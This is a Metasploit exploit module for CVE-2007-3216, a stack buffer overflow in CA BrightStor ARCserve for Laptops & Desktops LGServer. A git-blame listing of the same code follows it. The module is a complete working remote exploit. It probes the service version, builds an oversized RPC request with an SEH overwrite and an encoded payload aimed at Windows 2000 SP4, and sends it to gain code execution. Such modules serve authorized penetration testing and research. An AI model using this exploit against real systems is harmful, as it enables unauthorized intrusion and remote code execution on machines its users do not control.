modules/exploits/windows/brightstor/lgserver_multi.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
        for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,
        an attacker could overflow the buffer and execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-3216' ],
          [ 'OSVDB', '35329' ],
          [ 'BID', '24348' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x75022ac4 } ],
        ],
      'DisclosureDate' => '2007-06-06',
      'DefaultTarget' => 0))

    register_options([ Opt::RPORT(1900) ])
  end

  def check

    connect

    sock.put("0000000019rxrGetServerVersion")
    ver = sock.get_once

    disconnect

    if ( ver and ver =~ /11\.1\.742/ )
        return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe

  end

  def exploit

    connect

    rpc_commands = [
        "rxsAddNewUser",
        "rxsSetUserInfo",
        "rxsRenameUser",
        "rxsExportData",
        "rxcReadSaveSetProfile",
        "rxcInitSaveSetProfile",
        "rxcAddSaveSetNextAppList",
        "rxcAddSaveSetNextFilesPathList"
      ]

    rpc_command = rpc_commands[rand(rpc_commands.length)]

    data = rand_text_alpha_upper(62768)

    data[58468,8] = generate_seh_record(target.ret)
    data[58476,payload.encoded.length] = payload.encoded

    sploit  = "0000062768"				# Command Length Field
    sploit << rpc_command				# RPC Command
    sploit << "~~"					# Constant Argument Delimiter
    sploit << data

    print_status("Trying target #{target.name} with command '#{rpc_command}'...")
    sock.put(sploit)

    handler
    disconnect

  end
end
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`Rank = AverageRanking`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
Add next chunk of fixes 2014-03-11 12:07:27 -05:00			`'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow',`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`'Description' => %q{`
			`This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup`
			`for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,`
			`an attacker could overflow the buffer and execute arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2007-3216' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '35329' ],`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`[ 'BID', '24348' ],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ],`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2007-06-06',`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([ Opt::RPORT(1900) ])`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`def check`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`sock.put("0000000019rxrGetServerVersion")`
			`ver = sock.get_once`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
Saving progress 2014-01-21 11:07:03 -06:00			`if ( ver and ver =~ /11\.1\.742/ )`
			`return Exploit::CheckCode::Appears`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`return Exploit::CheckCode::Safe`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`def exploit`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
style compliance fixes 2010-11-04 23:59:56 +00:00			`rpc_commands = [`
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`"rxsAddNewUser",`
			`"rxsSetUserInfo",`
			`"rxsRenameUser",`
			`"rxsExportData",`
			`"rxcReadSaveSetProfile",`
			`"rxcInitSaveSetProfile",`
			`"rxcAddSaveSetNextAppList",`
			`"rxcAddSaveSetNextFilesPathList"`
			`]`
Retab modules 2013-08-30 16:28:54 -05:00
style compliance fixes 2010-11-04 23:59:56 +00:00			`rpc_command = rpc_commands[rand(rpc_commands.length)]`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`data = rand_text_alpha_upper(62768)`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`data[58468,8] = generate_seh_record(target.ret)`
			`data[58476,payload.encoded.length] = payload.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`sploit = "0000062768" # Command Length Field`
			`sploit << rpc_command # RPC Command`
			`sploit << "~~" # Constant Argument Delimiter`
			`sploit << data`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`print_status("Trying target #{target.name} with command '#{rpc_command}'...")`
			`sock.put(sploit)`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`handler`
			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit modules lgserver_multi.rb and moxa_mediadbplayback.rb 2010-11-04 22:19:26 +00:00			`end`
			`end`